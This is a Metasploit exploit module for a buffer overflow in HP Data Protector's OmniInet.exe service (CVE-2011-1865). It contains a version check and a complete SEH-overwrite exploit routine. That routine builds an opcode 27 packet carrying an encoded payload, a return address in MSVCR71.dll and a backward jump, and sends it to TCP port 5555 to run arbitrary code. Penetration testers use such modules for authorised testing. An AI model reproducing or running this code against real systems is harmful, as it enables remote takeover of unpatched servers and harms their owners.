## # This module requires Metasploit: http://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::Tcp include Msf::Exploit::Remote::Seh def initialize(info = {}) super(update_info(info, 'Name' => 'HP OmniInet.exe Opcode 27 Buffer Overflow', 'Description' => %q{ This module exploits a buffer overflow in the Hewlett-Packard OmniInet NT Service. By sending a specially crafted opcode 27 packet, a remote attacker may be able to execute arbitrary code. }, 'Author' => [ 'MC' ], 'License' => MSF_LICENSE, 'References' => [ [ 'CVE', '2011-1865' ], [ 'OSVDB', '73571'], [ 'URL', 'http://www.coresecurity.com/content/HP-Data-Protector-multiple-vulnerabilities' ], ], 'Privileged' => true, 'DefaultOptions' => { 'EXITFUNC' => 'seh', }, 'Payload' => { 'Space' => 800, 'BadChars' => "\x00", 'StackAdjustment' => -3500 }, 'Platform' => 'win', 'Targets' => [ [ 'HP Data Protector A.06.10 Build 611 / A.06.11 Build 243', { #POP/POP/RET from OmniBack\bin\MSVCR71.dll 'Ret' => 0x7c35630d } ], ], 'DefaultTarget' => 0, 'DisclosureDate' => 'Jun 29 2011')) register_options([Opt::RPORT(5555)], self.class) end def check connect sock.put(rand_text_alpha_upper(64)) resp = sock.get_once(-1,5) disconnect if (resp) resp = resp.unpack('v*').pack('C*') print_status("Received response: " + resp) # extract version if (resp =~ /HP Data Protector/) version = resp.split[3] elsif (resp =~ /HP OpenView Storage Data Protector/) version = resp.split[5] elsif (resp =~ /HP StorageWorks Application Recovery Manager/) version = resp.split[5] else return Exploit::CheckCode::Detected end version = version.split('.') major = version[1].to_i minor = version[2].to_i if ((major < 6) or (major == 6 and minor < 11)) return Exploit::CheckCode::Appears end if ((major > 6) or (major == 6 and minor >= 11)) return Exploit::CheckCode::Safe end end return Exploit::CheckCode::Safe end def exploit connect trigger = rand_text_alpha_upper(10000) trigger[4552, payload.encoded.length] = payload.encoded trigger[5352, 8] = generate_seh_record(target.ret) trigger[5360, 5] = Metasm::Shellcode.assemble(Metasm::Ia32.new, "jmp $-788").encode_string opcode = "27" packet = Rex::Text.to_unicode("\x00") packet << "\x27\xca" #length packet << "\xff\xfe\x32" packet << "\x00\x00\x00" packet << Rex::Text.to_unicode("\x20\x61\x00") * 3 packet << Rex::Text.to_unicode("\x20") packet << trigger packet << Rex::Text.to_unicode("\x00") packet << Rex::Text.to_unicode("\x20\x61\x00") packet << Rex::Text.to_unicode("\x20" + opcode + "\x00") packet << Rex::Text.to_unicode("\x20\x61\x00") * 24 print_status("Trying #{target.name}...") sock.put(packet) select(nil,nil,nil,10) handler disconnect end end